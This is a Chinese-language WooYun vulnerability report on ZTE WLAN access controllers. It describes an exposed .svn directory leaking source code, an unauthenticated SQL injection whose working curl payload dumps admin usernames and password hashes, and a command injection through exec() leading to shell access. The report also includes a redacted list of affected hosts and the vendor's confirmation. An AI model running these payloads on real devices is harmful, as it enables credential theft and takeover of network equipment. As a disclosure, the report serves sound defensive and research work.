当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151898

漏洞标题:中兴W-LAN无线接入控制器从信息泄露到cmdshell

相关厂商:中兴通讯股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-07 21:37

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-13: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-04: 细节向核心白帽子及相关领域专家公开
2016-01-14: 细节向普通白帽子公开
2016-01-24: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

rt

详细说明:

中兴通讯 - WLAN无线接入控制器
存在SVN信息泄漏,可导致源码信息泄漏。

aaaaaaaaaaaaaaaaaa111111111111111111111111.jpg


aaaaaaaaaaaaaaaaa2222222222222222222222222222.jpg


能够有权限的大部分的代码都有isLogin,譬如

<?php/*
文件名:sync_config.php
作者:chent
修改记录:
    2012-03-15 liangjl 增加:完成此页面后刷新主页面
    20110822 liangjl 恢复系统配置时,AC名字也要恢复成默认值
    20110208,pangm,修改reboot命令的使用方式
    20101028,pangm,写入syslog日志时,去除IP地址前的"::ffff:"
    20100824,pangm,实现恢复系统配置操作
    20090827,chent,修改配置保存时间的格式为形如: 2009-08-27 17:33:27,且只有在保存配置时更新此时间
    20090822,chent,保留备份,以防万一
    20090822,chent,PHP在裁减系统上无法用rename函数移动目录,因此改用调用系统mv命令来移动目录
*/?>
<?php include 'isLogin.php' ?>
<?php
    session_start();
?>


所以

grep -i -r -L 'islogin.php' --include='*.php' ./|more
.//ap/getIfApListFileExit.php
.//apgroup/getChannelByCountryCode.php
.//apgroup/wait_apgroup_inport.php
.//func/LicenseFunc.php
.//include/page.php
.//include/template.php
.//index.php
.//log/getIfApGroupExist.php
.//login.php
.//policy/IsWlanServiceEnable.php
.//policy/wait_policy.php
.//resetWebsvr.php
.//wait.php
.//wlan/getIfApUserExist.php
.//wlan/IfPasswMatch.php
.//wlan/SomeOrNone.php
.//wlan/wait_wlan.php
.//wlanport/getSsidByGroupid.php


找了下,注射一枚

<?php
/*********************************************************
**File:  根据国家码获取信道值
**Author:liucj
**Date:  2013-04-08
**Modify history:
**********************************************************/
?>
<?php
    $CountryCode = $_POST['CountryCode'];
    $ChannelType = $_POST['ChannelType'];
    $DBNAME = "sqlite:/icac/db/icac_cfg/icac_cfg.db";
    $dbh = new PDO($DBNAME);
    $sql = "select ChannelValue from CCAndChannelRelations where CountryCode = '".$CountryCode."' and ChannelType = '".$ChannelType."'";
    $stmt = $dbh->query($sql);
    $result = $stmt->fetchAll();
    $stmt = null;
    $dbh = null;
    echo json_encode($result);
?>


exp:

curl '**.**.**.**/apgroup/getChannelByCountryCode.php' -d "CountryCode=' union select UserName || '|'  || PassWord from LoginAccount --" -k
[{"ChannelValue":"admin|b7d5f153148d530064bb4b179b947349","0":"admin|b7d5f153148d530064bb4b179b947349"},{"ChannelValue":"icac|929193c8d183f6837c88b8a03e8c0bed","0":"icac|929193c8d183f6837c88b8a03e8c0bed"},{"ChannelValue":"user|c24a542f884e144451f9063b79e7994e","0":"user|c24a542f884e144451f9063b79e7994e"}]


然后就是各种管理权限了

cat ap/ap_hardware_info.php 
<!--
/*********************************************************
**File:  AP软硬件配置信息
**Author:冯朝晖
**Date:  2009-04-21
**Modify history:
*
**********************************************************/
-->
<?php include '../isLogin.php' ?>
<?php
    safeVar($_COOKIE);
    safeVar($_GET);
    safeVar($_POST);
    safeVar($_REQUEST);
?>
<html>
<head>
  <meta http-equiv="Content-Language" content="zh-cn">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <link href="/css/<?=$_COOKIE["_CSS_MAIN"]?>" rel="stylesheet" type="text/css">
  <title><?=HTITLE_SOFTHARD_CFGINFO?></title><!--软硬件配置信息-->
</head>
<?php
    $ApId = $_REQUEST['ApId'];
    $ip = $_REQUEST['ip'];
    $ManufId = $_REQUEST['ManufId'];
    
    $arrColName = array("EquipModel" => ROW_DEVICETYPE,//"设备型号",
                         "HardVer" => ROW_HARDVER,//"硬件版本",
                         "SoftwareName" => "软件名称",
                         "SoftVer" => ROW_SOFTVER,//"软件版本",
                         "FirmwareVer" => ROW_FIRMVER,//"固件版本",
                         "CpuModel" => "CPU型号",
                         "CpuSpeed" => "CPU处理能力",
                         "MemCapacity" => ROW_MEMORY_CAPACITY,//"内存容量",
                         "MemModel" => "内存型号",
                         "FlashCapacity" => ROW_FLASH_CAPACITY);//"FLASH容量");
                         
    $cmd = "get_shm_apinfo -a ".$ApId;
    $arr_ApInfo = array();
    $ret_val = -1;
    $last_line = exec($cmd, &$arr_ApInfo, &$ret_val);
    //echo "last_line=".$last_line."<br>";
    //echo "ip=".$ip."<br>";


搞定!

ifconfig
eth0      Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:40  
          inet addr:**.**.**.**  Bcast:**.**.**.**55  Mask:**.**.**.**
          inet6 addr: fe80::8674:2aff:feab:ea40/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:814196149 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:15 
          RX bytes:194057593507 (180.7 GiB)  TX bytes:0 (0.0 B)
          Interrupt:25 Base address:0xc000 
eth0:1    Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:40  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:25 Base address:0xc000 
eth1      Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:41  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:15 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:26 Base address:0xd000 
eth2      Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:42  
          inet6 addr: fe80::8674:2aff:feab:ea42/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:15 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:27 Base address:0xe000 
eth3      Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:43  
          inet6 addr: fe80::8674:2aff:feab:ea43/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:15 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:28 Base address:0xf000 
eth4      Link encap:Ethernet  HWaddr 84:74:2A:AB:EA:44  
          inet6 addr: fe80::8674:2aff:feab:ea44/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:15 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
          Interrupt:29 Base address:0x1000 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:8862210 errors:7182532 dropped:7182532 overruns:0 frame:0
          TX packets:8862210 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:570985424 (544.5 MiB)  TX bytes:570985424 (544.5 MiB)


注意:别信SQLmap

漏洞证明:

案例:

**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries
**.**.**.**//.svn/entries

修复方案:

删除.svn等文件

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-10 17:06

厂商回复:

感谢关注

最新状态:

暂无

漏洞评价:

评价

  1. 2015-11-07 21:59 | 玉林嘎 认证白帽子 ( 核心白帽子 | Rank:933 漏洞数:107 )

    关注

  2. 2015-11-07 22:08 | 暴走 ( 普通白帽子 | Rank:518 漏洞数:95 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    NB

  3. 2015-11-07 22:16 | 旧时人 ° ( 路人 | Rank:24 漏洞数:11 | 我将扼住命运的咽喉,它绝不能使我屈服!Bl...)

    11.11 前排出售女朋友

  4. 2015-11-07 22:41 | DNS ( 普通白帽子 | Rank:711 漏洞数:73 | root@qisec.com)

    6666前排收女朋友

  5. 2015-11-07 23:13 | YY-2012 ( 核心白帽子 | Rank:3429 漏洞数:697 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    各种膜拜,你懂的!

  6. 2015-11-07 23:25 | dslxin ( 普通白帽子 | Rank:136 漏洞数:35 | 岁月你别催)

    谁借我一个女朋友

  7. 2015-11-07 23:43 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  8. 2015-11-08 01:34 | 一只猿 ( 普通白帽子 | Rank:509 漏洞数:92 | 硬件与无线通信研究方向)

    666666

  9. 2015-11-08 10:42 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    。。